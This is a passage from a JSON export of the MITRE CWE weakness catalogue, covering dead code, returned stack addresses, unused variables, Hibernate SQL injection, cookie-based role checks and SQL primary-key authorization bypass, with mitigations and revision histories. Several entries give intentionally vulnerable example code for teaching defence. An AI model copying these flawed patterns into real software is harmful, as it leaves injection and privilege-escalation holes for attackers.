{}private void doTweedledumb() {}public static void main(String[] args) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"doTweedledumb();","attr":{"@_style":"margin-left:10px;"}},{"#text":"doTweedledee();","attr":{"@_style":"margin-left:10px;"}},{"#text":"System.out.println(\\"running DoubleDead\\");","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["",""]}}},"Body_Text":"(In this case it is a good thing that the methods are dead: invoking either one would cause an infinite loop.)"},{"Intro_Text":"The field named glue is not used in the following class. The author of the class has accidentally put quotes around the field name, transforming it into a string constant.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class Dead {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String glue;public String getGlue() {}","xhtml:br":["",""],"xhtml:div":{"#text":"return \\"glue\\";","attr":{"@_style":"margin-left:10px;"}}}}}}}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2014-1266","Description":"chain: incorrect \\"goto\\" in Apple SSL product bypasses certificate validation, allowing Adversary-in-the-Middle (AITM) attack (Apple \\"goto fail\\" bug). CWE-705 (Incorrect Control Flow Scoping) -&gt; CWE-561 (Dead Code) -&gt; CWE-295 (Improper Certificate Validation) -&gt; CWE-393 (Return of Wrong Status Code) -&gt; CWE-300 (Channel Accessible by Non-Endpoint).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1266"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC07-C","Entry_Name":"Detect and remove dead code"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"MSC00-PL","Entry_Name":"Detect and remove dead code","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP2","Entry_Name":"Unused Entities"},{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-20"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-20"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Common_Consequences, References, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}]}},"562":{"attr":{"@_ID":"562","@_Name":"Return of Stack Variable Address","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A function returns the address of a stack variable, which will cause unintended program behavior, typically in the form of a crash.","Extended_Description":"Because local variables are allocated on the stack, when a program returns a pointer to a local variable, it is returning a stack address. A subsequent function call is likely to re-use this same stack address, thereby overwriting the value of the pointer, which no longer corresponds to the same variable since a function\'s stack frame is invalidated when it returns. At best this will cause the value of the pointer to change unexpectedly. In many cases it causes the program to crash the next time the pointer is dereferenced.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"758","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"672","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"825","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Indirect"},{"Ordinality":"Primary"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Availability","Integrity","Confidentiality"],"Impact":["Read Memory","Modify Memory","Execute Unauthorized Code or Commands","DoS: Crash, Exit, or Restart"],"Note":"If the returned stack buffer address is dereferenced after the return, then an attacker may be able to modify or read memory, depending on how the address is used.  If the address is used for reading, then the address itself may be exposed, or the contents that the address points to.  If the address is used for writing, this can lead to a crash and possibly code execution."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Use static analysis tools to spot return of the address of a stack variable."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following function returns a stack address.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* getName() {}","xhtml:div":{"#text":"char name[STR_MAX];fillInName(name);return name;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"DCL30-C","Entry_Name":"Declare objects with appropriate storage durations","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS34-C","Entry_Name":"Do not call putenv() with a pointer to an automatic variable as the argument"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Stack Address Returned","attr":{"@_Date":"2008-04-11"}}}},"563":{"attr":{"@_ID":"563","@_Name":"Assignment to Variable without Use","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The variable\'s value is assigned but never used, making it a dead store.","Extended_Description":"After the assignment, the variable is either assigned another value or goes out of scope. It is likely that the variable is simply vestigial, but it is also possible that the unused variable points out a bug.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1164","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Alternate_Terms":{"Alternate_Term":{"Term":"Unused Variable"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"],"Note":"This weakness could be an indication of a bug in the program or a deprecated variable that was not removed and is an indication of poor quality. This could lead to further bugs and the introduction of weaknesses."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Remove unused variables from the code."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code excerpt assigns to the variable r and then overwrites the value without using it.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"r = getName();r = getNewBuffer(buf);","xhtml:br":""}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC00-C","Entry_Name":"Compile cleanly at high warning levels"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"MSC01-PL","Entry_Name":"Detect and remove unused variables","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP2","Entry_Name":"Unused Entities"}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Common_Consequences, Description, Name, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Alternate_Terms, Name, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Unused Variable","attr":{"@_Date":"2014-06-23"}},{"#text":"Assignment to Variable without Use (\'Unused Variable\')","attr":{"@_Date":"2017-11-08"}}]}},"564":{"attr":{"@_ID":"564","@_Name":"SQL Injection: Hibernate","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Using Hibernate to execute a dynamic SQL statement built with user-controlled input can allow an attacker to modify the statement\'s meaning or to execute arbitrary SQL commands.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"89","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"89","@_View_ID":"928","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"89","@_View_ID":"1305","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"A non-SQL style database which is not subject to this flaw may be chosen."},{"Phase":"Architecture and Design","Description":"Follow the principle of least privilege when creating user accounts to a SQL database. Users should only have the minimum privileges necessary to use their account. If the requirements of the system indicate that a user can read and modify their own data, then limit their privileges so they cannot read/write others\' data."},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"Phase":"Implementation","Description":"Implement SQL strings using prepared statements that bind variables. Prepared statements that do not bind variables can be vulnerable to attack."},{"Phase":"Implementation","Description":"Use vigorous allowlist style checking on any user input that may be used in a SQL command. Rather than escape meta-characters, it is safest to disallow them entirely. Reason: Later use of data that have been entered in the database may neglect to escape meta-characters before use. Narrowly define the set of safe characters based on the expected value of the parameter in the request."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code excerpt uses Hibernate\'s HQL syntax to build a dynamic query that\'s vulnerable to SQL injection.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String street = getStreetFromUser();Query query = session.createQuery(\\"from Address a where a.street=\'\\" + street + \\"\'\\");","xhtml:br":""}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"109"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"565":{"attr":{"@_ID":"565","@_Name":"Reliance on Cookies without Validation and Integrity Checking","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application relies on the existence or values of cookies when performing security-critical operations, but it does not properly ensure that the setting is valid for the associated user.","Extended_Description":"Attackers can easily modify cookies, within the browser or by implementing the client-side code outside of the browser. Reliance on cookies without detailed validation and integrity checking can allow attackers to bypass authentication, conduct injection attacks such as SQL injection and cross-site scripting, or otherwise modify inputs in unexpected ways.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"642","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"669","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"602","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"It is dangerous to use cookies to set a user\'s privileges. The cookie can be manipulated to escalate an attacker\'s privileges to an administrative level."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Avoid using cookie data for a security-related decision."},{"Phase":"Implementation","Description":"Perform thorough input validation (i.e.: server side validation) on the cookie data if you\'re going to use it for a security related decision."},{"Phase":"Architecture and Design","Description":"Add integrity checks to detect tampering."},{"Phase":"Architecture and Design","Description":"Protect critical cookies from replay attacks, since cross-site scripting or other attacks may allow attackers to steal a strongly-encrypted cookie that also passes integrity checks. This mitigation applies to cookies that should only be valid during a single transaction or session. By enforcing timeouts, you may limit the scope of an attack. As part of your integrity check, use an unpredictable, server-side value that is not exposed to the client."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-61"},"Intro_Text":"The following code excerpt reads a value from a browser cookie to determine the role of the user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Cookie[] cookies = request.getCookies();for (int i =0; i&lt; cookies.length; i++) {}","xhtml:br":"","xhtml:div":{"#text":"Cookie c = cookies[i];if (c.getName().equals(\\"role\\")) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"userRole = c.getValue();","attr":{"@_style":"margin-left:10px;"}}}}},"Body_Text":"It is easy for an attacker to modify the \\"role\\" value found in the locally stored cookie, allowing privilege escalation."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP29","Entry_Name":"Faulty endpoint authentication"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"226"}},{"attr":{"@_CAPEC_ID":"31"}},{"attr":{"@_CAPEC_ID":"39"}}]},"Notes":{"Note":{"#text":"This problem can be primary to many types of weaknesses in web applications. A developer may perform proper validation against URL parameters while assuming that attackers cannot modify cookies. As a result, the program might skip basic input validation to enable cross-site scripting, SQL injection, price tampering, and other attacks..","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Description, Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-16","Modification_Importance":"Critical","Modification_Comment":"Clarified name and description; broadened the definition to include any security-critical operation, not just security decisions, to allow for relationships with injection weaknesses."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Name, Potential_Mitigations, Relationship_Notes, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Use of Cookies","attr":{"@_Date":"2008-04-11"}},{"#text":"Use of Cookies in Security Decision","attr":{"@_Date":"2009-07-27"}}]}},"566":{"attr":{"@_ID":"566","@_Name":"Authorization Bypass Through User-Controlled SQL Primary Key","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a database table that includes records that should not be accessible to an actor, but it executes a SQL statement with a primary key that can be controlled by that actor.","Extended_Description":{"xhtml:p":["When a user can set a primary key to any value, then the user can modify the key to point to unauthorized records.","Database access control errors occur when:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Data enters a program from an untrusted source.","The data is used to specify the value of a primary key in a SQL query.","The untrusted source does not have the permissions to be able to access all rows in the associated table."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"639","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Technology":{"attr":{"@_Name":"Database Server","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control"],"Impact":["Read Application Data","Modify Application Data","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Assume all input is malicious. Use a standard input validation mechanism to validate all input for length, type, syntax, and business rules before accepting the data. Use an \\"accept known good\\" validation strategy."},{"Phase":"Implementation","Description":"Use a parameterized query AND make sure that the accepted values conform to the business rules. Construct your SQL statement accordingly."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code uses a parameterized statement, which escapes metacharacters and prevents SQL injection vulnerabilities, to construct and execute a SQL query that searches for an invoice matching the specified identifier [1]. The identifier is selected from a list of all invoices associated with the current authenticated user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"...conn = new SqlConnection(_ConnectionString);conn.Open();int16 id = System.Convert.ToInt16(invoiceID.Text);SqlCommand query = new SqlCommand( \\"SELECT * FROM invoices WHERE id = @id\\", conn);query.Parameters.AddWithValue(\\"@id\\", id);SqlDataReader objReader = objCommand.ExecuteReader();...","xhtml:br":["","","","","","",""]}},"Body_Text":"The problem is that the developer has not considered all of the possible values of id. Although the interface generates a list of invoice identifiers that belong to the current user, an attacker can bypass this interface to request any desired invoice. Because the code in this example does not check to ensure that the user has permission to access the requested invoice, it will display any invoice, even if it does not belong to the current user."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP25","Entry_Name":"Tainted input to variable"}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples, Description, Other_Notes, Potential_Mitigations, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Access Control Bypass Through User-Controlled SQL Primary Key","attr":{"@_Date":"2011-03-29"}}}},"567":{"attr":{"@_ID":"567","@_Name":"Unsynchronized Access to Shared Data in a Multithreaded Context","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not properly synchronize shared data, such as static variables across threads, which can lead to undefined behavior and unpredictable data changes.","Extended_Description":{"xhtml:p":["Within servlets, shared static variables are not protected from concurrent access, but servlets are 